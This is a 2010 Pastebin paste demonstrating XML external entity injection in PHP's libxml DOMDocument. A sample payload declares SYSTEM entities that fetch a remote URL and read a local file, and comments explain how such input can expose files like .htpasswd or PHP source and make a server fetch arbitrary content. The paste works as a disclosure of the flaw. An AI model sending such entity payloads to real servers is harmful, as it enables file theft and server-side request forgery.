a guest Feb 6th, 2010 252 Never
- * Place a "foo.txt" file containing random text in the directory
- * containing this PHP script.
- * Wrote this in PHP, note that this "feature" is also present with
- * any libxml wrapper (like lxml in Python).
- * I do not know if other XML parsers implement that.
- /* In real life, this may come from $_POST or an uploaded file */
- $document = <<<'EOF'
- <?xml version="1.0"?>
- <!DOCTYPE root [
- <!ENTITY robots SYSTEM "http://google.com/robots.txt">
- <!ENTITY foobar SYSTEM "foo.txt">
- $xml = new DOMDocument();
- foreach ($xml->getElementsByTagName('root') as $e)
- echo $e->nodeValue;
- * For those who did not understand the consequences : imagine that
- * you are processing XML sent by users and displaying the result back.
- * The users now have a way to display the contents of almost any file
- * accessible by the user launching the script (almost, because libxml
- * implements some kind of security by disallowing any absolute URI)
- * which does not contain invalid XML data. For example, a .htpasswd file,
- * or simple PHP files.
- * Also, they can make your server download porn.
RAW Paste Data